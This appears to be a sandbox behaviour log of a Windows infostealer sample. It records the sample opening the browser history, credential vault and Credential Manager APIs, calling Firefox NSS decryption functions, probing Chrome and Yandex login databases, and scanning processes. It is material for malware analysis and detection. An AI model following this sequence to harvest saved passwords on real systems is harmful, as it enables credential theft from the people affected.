| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, size = 8, size_out = 8 |
|
92 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 8, size_out = 8 |
|
92 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextA, address_out = 0x750d91dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x750de124 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x750ddf4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x750ddf7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x750ddf36 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x750ddf66 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x751171c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x750db2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x75117941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x75117381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x75117481 |
|
1 | |
| Module | Load | module_name = pstorec.dll, base_address = 0x73eb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\pstorec.dll, function = PStoreCreateInstance, address_out = 0x73eb526c |
|
1 | |
| Module | Load | module_name = vaultcli.dll, base_address = 0x74b10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\vaultcli.dll, function = VaultOpenVault, address_out = 0x74b126a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\vaultcli.dll, function = VaultCloseVault, address_out = 0x74b12718 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x74b13099 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\vaultcli.dll, function = VaultFree, address_out = 0x74b14321 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\vaultcli.dll, function = VaultGetInformation, address_out = 0x74b124c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\vaultcli.dll, function = VaultGetItem, address_out = 0x74b13242 |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\history.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, type = time |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, type = file_attributes |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = IsRelative, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = Path |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = IsRelative, default_value = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, base_address = 0x73b00000 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x73bbd70b |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x73bbd13c |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x73b53c51 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x73b53333 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x73b3cbc4 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x73b3d3ca |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x73b500a7 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\logins.json, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| File | Get Info | filename = C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, base_address = 0x73b00000 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_open, address_out = 0x73c61ca0 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_prepare, address_out = 0x73bece70 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_step, address_out = 0x73c55200 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_text, address_out = 0x73c0d400 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_int, address_out = 0x73c0d3a0 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_int64, address_out = 0x73c0d3d0 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_finalize, address_out = 0x73c39f60 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_close, address_out = 0x73c3bde0 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_exec, address_out = 0x73c3a270 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Module | Get Handle | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, base_address = 0x73b00000 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x73bbd70b |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x73bbd13c |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x73b53c51 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x73b53333 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x73b3cbc4 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x73b3d3ca |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x73b500a7 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Load | module_name = psapi.dll, base_address = 0x75890000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7589152c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75891408 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x758913f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75891544 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleInformation, address_out = 0x75891420 |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\taskhost.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = QueryFullProcessImageNameW, address_out = 0x74cd15f7 |
|
1 | |
| Process | Get filename | file_name = C:\Windows\System32\taskhost.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x74cdd60f |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\dwm.exe, size = 260 |
|
1 | |
| Process | Get filename | file_name = C:\Windows\System32\dwm.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\windows\explorer.exe, size = 260 |
|
1 | |
| Process | Get filename | file_name = C:\Windows\explorer.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft office\root\office16\onenotem.exe, size = 260 |
|
1 | |
| Process | Get filename | file_name = C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\mozilla maintenance service\villagescirclelaboratory.exe, file_name_orig = C:\Program Files (x86)\Mozilla Maintenance Service\villagescirclelaboratory.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\microsoft office\suffering-draw.exe, file_name_orig = C:\Program Files (x86)\Microsoft Office\suffering-draw.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files\msbuild\wright_index_transfers_mystery.exe, file_name_orig = C:\Program Files\MSBuild\wright_index_transfers_mystery.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\uninstall information\kinasescoredformatsnb.exe, file_name_orig = C:\Program Files (x86)\Uninstall Information\kinasescoredformatsnb.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft office 15\teach-minnesota.exe, file_name_orig = C:\Program Files\Microsoft Office 15\teach-minnesota.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\internet explorer\teacher sectors.exe, file_name_orig = C:\Program Files (x86)\Internet Explorer\teacher sectors.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\mozilla firefox\th rw.exe, file_name_orig = C:\Program Files (x86)\Mozilla Firefox\th rw.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows media player\gis-mom-belly.exe, file_name_orig = C:\Program Files\Windows Media Player\gis-mom-belly.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files\reference assemblies\madagascar.exe, file_name_orig = C:\Program Files\Reference Assemblies\madagascar.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\microsoft onedrive\victory nasa daughters.exe, file_name_orig = C:\Program Files (x86)\Microsoft OneDrive\victory nasa daughters.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files\internet explorer\flower organizer george.exe, file_name_orig = C:\Program Files\Internet Explorer\flower organizer george.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\windows defender\scripts animals.exe, file_name_orig = C:\Program Files (x86)\Windows Defender\scripts animals.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\java\changes_directors_inclusion.exe, file_name_orig = C:\Program Files (x86)\Java\changes_directors_inclusion.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\microsoft office\heather-makeup.exe, file_name_orig = C:\Program Files (x86)\Microsoft Office\heather-makeup.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows nt\variations_afraid_providing_virtual.exe, file_name_orig = C:\Program Files\Windows NT\variations_afraid_providing_virtual.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\windows nt\rear accident ibm.exe, file_name_orig = C:\Program Files (x86)\Windows NT\rear accident ibm.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files\msbuild\interstate.exe, file_name_orig = C:\Program Files\MSBuild\interstate.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\microsoft.net\lang rats isbn prize.exe, file_name_orig = C:\Program Files (x86)\Microsoft.NET\lang rats isbn prize.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files\common files\affiliated.exe, file_name_orig = C:\Program Files\Common Files\affiliated.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\program files (x86)\java\example-straight-cad-vc.exe, file_name_orig = C:\Program Files (x86)\Java\example-straight-cad-vc.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\taskeng.exe, size = 260 |
|
1 | |
| Process | Get filename | file_name = C:\Windows\System32\taskeng.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe |
|
1 | |
| File | Get Info | filename = C:\Program Files (x86)\Sea Monkey\nss3.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data, desired_access = GENERIC_READ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
